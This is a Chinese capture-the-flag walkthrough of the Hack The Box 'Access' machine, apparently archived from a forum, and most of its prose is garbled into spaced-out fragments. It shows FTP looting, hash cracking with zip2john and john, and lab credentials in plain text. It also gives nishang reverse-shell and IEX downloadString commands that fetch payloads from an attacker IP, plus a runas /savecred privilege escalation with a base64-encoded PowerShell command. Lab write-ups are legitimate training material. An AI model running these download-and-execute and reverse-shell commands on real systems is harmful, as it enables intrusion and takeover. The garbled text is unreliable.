[26777] 2019-03-09_【HTB系列】靶机Access的渗透测试详解

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-19
2019-03-09_【HTB系列】靶机Access的渗透测试详解 H T B A c c e s s     M s 0 8 0 6 7   2 0 1 9 - 0 3 - 0 9   #   , 2 3 H a c k   T h e   B o x C T F 线 C T F h t t p s : / / w w w . h a c k t h e b o x . e u / A c c e s s . n m a p n m a p   - s C   - s V   - T 5   1 0 . 1 0 . 1 0 . 9 8 2 1 2 3 8 0 t e l n e t n m a p t e l n e t m s f F T P   使 m s f / a u x i l i a r y / s c a n n e r / f t p / a n o n y m o u s F T P F T P 西
w g e t F T P w g e t   - m   f t p : / / a n o n y m o u s : a n o n y m o u s @ 1 0 . 1 0 . 1 0 . 9 8   P A S V   - - n o - p a s s i v e   使 F T P w g e t   - m   - - n o - p a s s i v e   f t p : / / a n o n y m o u s : a n o n y m o u s @ 1 0 . 1 0 . 1 0 . 9 8     T e l n e t 2 3 t e l n e t 访 8 0 d o w n l o a d e x i f t o o l
s t r i n g s   s t r i n g s   o u t . j p g     g o b u s t e r g o b u s t e r   - u   h t t p : / / 1 0 . 1 0 . 1 0 . 9 8   - w   / u s r / s h a r e / w o r d l i s t s / d i r b u s t e r / d i r e c t o r y - l i s t - 2 . 3 - m e d i u m . t x t F T P E n g i n e e r A c c e s s   C o n t r o l . Z i p 7 z 7 z   x   A c c e s s   C o n t r o l . z i p Z I P 便 7 z   l s l t 7 z   l   - s l t   A c c e s s   C o n t r o l . z i p     l
l S l t l 使 A E S - 2 5 6   D e f l a t e H A S H z i p 2 j o h n   A c c e s s   C o n t r o l . z i p   >   A c c e s s   C o n t r o l . h a s h a c c e s s 8 s t r i n g s m d b 8 w o r d l i s t s t r i n g s   - n   8   b a c k u p . m d b   |   s o r t   - u   >   . . / E n g i n e e r / w o r d l i s t     s t r i n g s s o r t - u j o h n
j o h n j o h n   A c c e s s   C o n t r o l . h a s h   - - s h o w     :   a c c e s s 4 u @ s e c u r i t y f i l e . p s t o u t l o o k r e a d p s t A c c e s s   C o n t r o l . m b o x l e s s   A c c e s s   C o n t r o l . m b o x     s e c u r i t y 4 C c 3 s s C 0 n t r 0 l l e r t e l n e t S e c u r i t y 4 C c 3 s s C 0 n t r 0 l l e r
C D u s e r . t x t u s e r f l a g . p o w e r s h e l l p o w e r s h e l l H T T P p o w e r s h e l l s h e l l s h e l l n i s h a n g   P o w e r s h e l l :   h t t p s : / / g i t h u b . c o m / s a m r a t a s h o k / n i s h a n g   w w w   n i s h a n g c o p y c p   ~ / H T B / A c c e s s / n i s h a n g / S h e l l s / I n v o k e - P o w e r S h e l l T c p . p s 1   ~ / H T B / A c c e s s / w w w / n i s h a n g . p s 1     v i n i s h a n g . p s 1 I n v o k e - P o w e r S h e l l T c p   - R e v e r s e   - I P A d d r e s s   I P   - P o r t   n c   9 0 0 1 p y t h o n H T T P t e l n e t p o w e r s h e l l p o w e r s h e l l   " I E X ( N e w - O b j e c t   N e t . W e b C l i e n t ) . d o w n l o a d S t r i n g ( ' h t t p : / / 1 0 . 1 0 . 1 3 . 1 4 7 : 8 0 0 0 / n i s h a n g . p s 1 ' ) "     s h e l l W i n d o w s J A W S h t t p s : / / g i t h u b . c o m / 4 1 1 H a l l / J A W S s h e l l I E X ( N e w - O b j e c t   N e t . W e b C l i e n t ) . d o w n l o a d S t r i n g ( ' h t t p : / /   1 0 . 1 0 . 1 3 . 1 4 7 : 8 0 0 0 / j a w s - e n u m . p s 1 ' )    
c m d k e y   / l i s t   t y p e R u n a s / s a v e c r e d   R u n a s h t t p s : / / b l o g . c s d n . n e t / n z j d s d s / a r t i c l e / d e t a i l s / 8 8 3 1 2 9 1 0 t y p e s c r i p t 1 .     $ W S c r i p t   =   N e w - O b j e c t   - C o m O b j e c t   W s c r i p t . S h e l l     2 .     $ s h o r t c u t   =   G e t - C h i l d I t e m   * . l n k     3 .     $ W s c r i p t . C r e a t e S h o r t c u t ( $ s h o r t c u t )     W S c r i p t W s c r i p t . S h e l l G e t - C h i l d I t e m   * . l n k   d i r . l n k
W s c r i p t C r e a t e S h o r t c u t l n k S A V E Z K A c c e s s 3 . 5 S e c u r i t y   S y s t e m . l n k r u n a s   s a v e c r e d   r u n a s r u n a s s h e l l r u n a s s h e l l K a l i 9 0 0 2 n i s h a n g . p s 1 n i s h a n g 2 . p s 1 n i s h a n g 2 . p s 1 9 0 0 2 I P 1 0 . 1 0 . 1 2 . 1 1 4 r u n a s   / u s e r : A C C E S S A d m i n i s t r a t o r   / s a v e c r e d   " p o w e r s h e l l   " I E X ( N e w - O b j e c t   N e t . W e b C l i e n t ) . d o w n l o a d S t r i n g ( ' h t t p : / / 1 0 . 1 0 . 1 2 . 1 1 4 : 8 0 0 0 / n i s h a n g 2 . p s 1 ' ) " "     p y t h o n   H T T P 9 0 0 2 s h e l l w i n d o w s l i n u x w i n d o w s i c o n v b a s e 6 4 U T F - 1 6 L E e c h o   - n   " I E X ( N e w - O b j e c t   N e t . W e b C l i e n t ) . d o w n l o a d S t r i n g ( ' h t t p : / / 1 0 . 1 0 . 1 2 . 1 1 4 : 8 0 0 0 / n i s h a n g 2 . p s 1 ' ) "   |   i c o n v   - - t o - c o d e   U T F - 1 6 L E   |   b a s e 6 4   - w   0     S Q B F A F g A K A B O A G U A d w A t A E 8 A Y g B q A G U A Y w B 0 A C A A T g B l A H Q A L g B X A G U A Y g B D A G w A a Q B l A G 4 A d A A p A C 4 A Z A B v A H c A b g B s A G 8 A Y Q B k A F M A d A B y A G k A b g B n A C g A J w B o A H Q A d A B w A D o A L w A v A D E A M A A u A D E A M A A u A D E A M g A u A D E A M Q A 0 A D o A O A A w A D A A M A A v A G 4 A a Q B z A G g A Y Q B u A G c A M g A u A H A A c w A x A C c A K Q A = r u n a s   / u s e r : A C C E S S A d m i n i s t r a t o r   / s a v e c r e d   " P o w e r s h e l l   - E n c o d e d C o m m a n d   S Q B F A F g A K A B O A G U A d w A t A E 8 A Y g B q A G U A Y w B 0 A C A A T g B l A H Q A L g B X A G U A Y g B D A G w A a Q B l A G 4 A d A A p A C 4 A Z A B v A H c A b g B s A G 8 A Y Q B k A F M A d A B y A G k A b g B n A C g A J w B o A H Q A d A B w A D o A L w A v A D E A M A A u A D E A M A A u A D E A M g A u A D E A M Q A 0 A D o A O A A w A D A A M A A v A G 4 A a Q B z A G g A Y Q B u A G c A M g A u A H A A c w A x A C c A K Q A = " 9 0 0 2 s h e l l r o o t f l a g
r o o t f l a g M s 0 8 0 6 7 1 . 2 . S S R F g e t s h e l l 3 . S O C K S   m s 0 8 0 6 7  
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则